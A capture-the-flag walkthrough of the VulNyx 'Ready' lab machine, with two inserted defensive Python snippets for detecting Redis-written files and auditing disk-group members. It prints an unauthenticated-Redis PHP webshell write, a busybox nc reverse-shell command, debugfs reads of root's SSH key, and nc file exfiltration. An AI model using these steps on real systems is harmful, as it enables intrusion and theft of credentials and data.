🟢 NYX - Ready
#vulnyx
#nyx
#linux
#redis
#rce
#disk (group)
#id_rsa (crack)
#zip (crack)
June 16, 2023 by Miguel R. (d4t4s3c)
Information
Ready is a Linux machine on the VulNyx platform; it is rated easy difficulty and was created by the user d4t4s3c.
- Initial access: a Redis service is found that allows access as a guest user; a file containing PHP code is written into the web server's document root and I obtain a shell.
- Privilege escalation: the user is a member of the disk group, which allows reading the root user's private key (id_rsa).
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-14 16:01 CET
Nmap scan report for 192.168.1.42
Host is up (0.00023s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6379/tcp open redis
8080/tcp open http-proxy
❯ nmap -sVC -p22,80,6379,8080 192.168.1.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-14 16:02 CET
Nmap scan report for 192.168.1.42
Host is up (0.00048s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 51:f9:f5:59:cd:45:4e:d1:2c:06:41:3b:a6:7a:91:19 (RSA)
| 256 5c:9f:60:b7:c5:50:fc:01:fa:37:7c:dc:16:54:87:3b (ECDSA)
|_ 256 04:da:68:25:69:d6:2a:25:e2:5b:e2:99:36:36:d7:48 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Apache2 Test Debian Default Page: It works
6379/tcp open redis Redis key-value store 6.0.16
8080/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Apache2 Test Debian Default Page: It works
|_http-open-proxy: Proxy might be redirecting requests
Shell (ben)
80/TCP (HTTP)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.42/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.42/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 277]
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
8080/TCP (HTTP)
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.42:8080/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.42:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
6379/TCP (REDIS)
I connect to the Redis service in a guest session, without providing a password
❯ redis-cli -h 192.168.1.42
192.168.1.42:6379> PING
PONG
Generate WebShell
Since there are web servers, I try from Redis to create a PHP webshell in /var/www/html, and it succeeds
192.168.1.42:6379> config set dir /var/www/html
OK
192.168.1.42:6379> config set dbfilename cmd.php
OK
192.168.1.42:6379> set cmd "<?php system($_GET['cmd']); ?>"
OK
192.168.1.42:6379> save
OK
8080/TCP (HTTP)
I manage to run commands as user ben
❯ curl -s --output - 'http://192.168.1.42:8080/cmd.php?cmd=id' |strings
REDIS0009
redis-ver
6.0.16
redis-bits
ctime
used-mem
aof-preamble
uid=1000(ben) gid=1000(ben) groups=1000(ben),6(disk)
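Defender's note, added here and not part of the original writeup: the curl output above begins with the RDB header REDIS0009 because the whole Redis dump, not only the PHP string, was written out as cmd.php. That header is a reliable marker for files Redis has dropped into a document root. The Python below (my own example; the web root path and the sample files are constructed) scans a directory for it:

```python
import re
import tempfile
from pathlib import Path

# Redis RDB files start with the ASCII magic "REDIS" plus a 4-digit version
# (the walkthrough's dump begins "REDIS0009"). Such a header on a file inside a
# web root means Redis wrote it there, which only happens when CONFIG SET
# dir/dbfilename followed by SAVE was accepted from a client.
RDB_MAGIC = re.compile(rb"\AREDIS\d{4}")

def find_rdb_dumps(web_root):
    """Return paths (relative to web_root) whose first bytes carry RDB magic."""
    root = Path(web_root)
    hits = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        try:
            with path.open("rb") as fh:
                head = fh.read(9)
        except OSError:
            continue  # unreadable file: skip it, do not abort the scan
        if RDB_MAGIC.match(head):
            hits.append(path.relative_to(root).as_posix())
    return sorted(hits)

def build_sample_webroot(base):
    """Constructed sample web root: normal content plus one Redis-written file."""
    base = Path(base)
    (base / "index.html").write_bytes(b"<html><body>It works</body></html>")
    (base / "assets").mkdir()
    (base / "assets" / "app.js").write_bytes(b"console.log('ok');")
    # Minimal RDB-shaped content: magic, one aux field, EOF marker (constructed).
    rdb = b"REDIS0009" + b"\xfa\x09redis-ver\x066.0.16" + b"\xff"
    (base / "cmd.php").write_bytes(rdb)
    return str(base)

def demo():
    """Build the sample web root in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return find_rdb_dumps(build_sample_webroot(tmp))

if __name__ == "__main__":
    for hit in demo():
        print("possible Redis-written file in web root:", hit)
```

Pointing find_rdb_dumps at a real /var/www/html turns this into a quick post-incident sweep; the underlying fix is requirepass, protected-mode and a non-web-served dir in redis.conf.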
Reverse Shell
Now that I can run commands, I try to obtain a reverse shell
❯ curl -sX GET "http://192.168.1.42:8080/cmd.php?cmd=busybox+nc+192.168.1.10+443+-e+/bin/sh"
I get the shell as user ben
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.42] 59476
id ; hostname
uid=1000(ben) gid=1000(ben) groups=1000(ben),6(disk)
ready
Flag (user.txt)
I can read the user.txt flag
ben@ready:~$ cat user.txt
e5d3f52*************************
Privilege Escalation
Enumeration
The user ben is a member of the disk group, which gives it privileged access to the system's disks and partitions
ben@ready:/$ id
uid=1000(ben) gid=1000(ben) groups=1000(ben),6(disk)
Abuse (disk group)
I manage to read the root user's private key id_rsa
ben@ready:/$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 6.9G 1.5G 5.1G 23% /
udev 473M 0 473M 0% /dev
tmpfs 489M 0 489M 0% /dev/shm
tmpfs 98M 492K 98M 1% /run
tmpfs 5.0M 0 5.0M 0% /run/lock
ben@ready:/$ /usr/sbin/debugfs /dev/sda1
debugfs 1.46.2 (28-Feb-2021)
debugfs: cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,02E266E7A66462FE
-----END RSA PRIVATE KEY-----
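As an added example (my own, not from the original writeup), a small audit in Python for the condition abused here: any account in the disk group can open /dev/sda1 directly and bypass file permissions, so the check lists non-root accounts that receive the group either as a supplementary group in /etc/group or as their primary GID in /etc/passwd. The sample files are constructed; the svc account is a hypothetical extra case not on this machine.

```python
# Audit: who can read raw block devices through the "disk" group? A member of
# disk can open /dev/sda1 directly (e.g. with debugfs) and read any file on the
# filesystem regardless of its permissions, as the walkthrough shows. Group
# membership comes from two places: the member list in /etc/group and the
# primary GID in /etc/passwd, so both files are checked.

GROUP_SAMPLE = """root:x:0:
disk:x:6:ben
sudo:x:27:
ben:x:1000:
"""  # constructed, modelled on the walkthrough (ben is in disk)

PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
ben:x:1000:1000::/home/ben:/bin/bash
svc:x:1001:6::/home/svc:/usr/sbin/nologin
"""  # constructed: svc has disk as primary group, so it never appears in /etc/group

def parse_group(text, name):
    """Return (gid, [members]) for group `name`, or None if it is absent."""
    for line in text.splitlines():
        f = line.split(":")
        if len(f) >= 4 and f[0] == name:
            return int(f[2]), [m for m in f[3].split(",") if m]
    return None

def users_with_primary_gid(text, gid):
    """Accounts in passwd-format `text` whose primary GID equals `gid`."""
    users = []
    for line in text.splitlines():
        f = line.split(":")
        if len(f) >= 4 and f[3].isdigit() and int(f[3]) == gid:
            users.append(f[0])
    return users

def disk_group_members(group_text, passwd_text, group="disk"):
    """Non-root accounts that get block-device access through `group`."""
    parsed = parse_group(group_text, group)
    if parsed is None:
        return []
    gid, members = parsed
    found = set(members) | set(users_with_primary_gid(passwd_text, gid))
    found.discard("root")
    return sorted(found)

def audit_live(group="disk"):
    """Run the same check against this host's /etc/group and /etc/passwd."""
    try:
        with open("/etc/group") as g, open("/etc/passwd") as p:
            return disk_group_members(g.read(), p.read(), group)
    except OSError:
        return []  # not a Unix host or files unreadable

if __name__ == "__main__":
    print("sample:", disk_group_members(GROUP_SAMPLE, PASSWD_SAMPLE))
    print("this host:", audit_live())
```

Any account the audit reports should be removed from disk (gpasswd -d user disk) unless it genuinely needs raw device access.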
Cracking (id_rsa)
With RSAcrack I obtain the id_rsa password: shelly
❯ RSAcrack -k id_rsa -w /opt/techyou.txt
╭━━━┳━━━┳━━━╮ ╭╮
┃╭━╮┃╭━╮┃╭━╮┃ ┃┃
┃╰━╯┃╰━━┫┃ ┃┣━━┳━┳━━┳━━┫┃╭╮
┃╭╮╭┻━━╮┃╰━╯┃╭━┫╭┫╭╮┃╭━┫╰╯╯
┃┃┃╰┫╰━╯┃╭━╮┃╰━┫┃┃╭╮┃╰━┫╭╮╮
╰╯╰━┻━━━┻╯ ╰┻━━┻╯╰╯╰┻━━┻╯╰╯
─────────────────────────────
code: d4t4s3c ver: v1.0.0
─────────────────────────────
[!] Cracking | id_rsa
[!] Wordlist | /opt/techyou.txt
[*] Status | 979/10000/9%/shelly
[+] Password | shelly
─────────────────────────────
22/TCP (SSH)
I log into the system as root with the obtained private key
❯ ssh -i id_rsa root@192.168.1.42
Enter passphrase for key 'id_rsa':
Linux ready 5.10.0-16-amd64 #1 SMP Debian 5.10.127-1 (2022-06-30) x86_64
Last login: Wed Jul 12 18:22:32 2023
root@ready:~# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
ready
When trying to read the root.txt flag, it appears to be inside the file root.zip
root@ready:~# ls -l
total 4
-rw------- 1 root root 225 abr 18 2023 root.zip
I transfer the root.zip file to my local machine
root@ready:~# md5sum root.zip
e72dd8ebb0227bda9e33a44abad9b23e root.zip
root@ready:~# nc 192.168.1.10 1234 < root.zip
❯ nc -lvnp 1234 > root.zip
listening on [any] 1234 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.42] 41398
^C
❯ md5sum root.zip
e72dd8ebb0227bda9e33a44abad9b23e root.zip
When trying to unzip root.zip, it asks for a password
❯ unzip root.zip
Archive: root.zip
[root.zip] root.txt password:
Cracking (ZIP File)
With zip2john I obtain the ZIP file's password: already
❯ zip2john root.zip >hash
❯ john --wordlist=/opt/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
already (root.zip/root.txt)
Flag (root.txt)
I can read the root.txt flag
❯ unzip root.zip
Archive: root.zip
[root.zip] root.txt password:
inflating: root.txt
❯ cat root.txt
cf537b0******************************
That concludes the resolution of the Ready machine.
Happy Hacking!
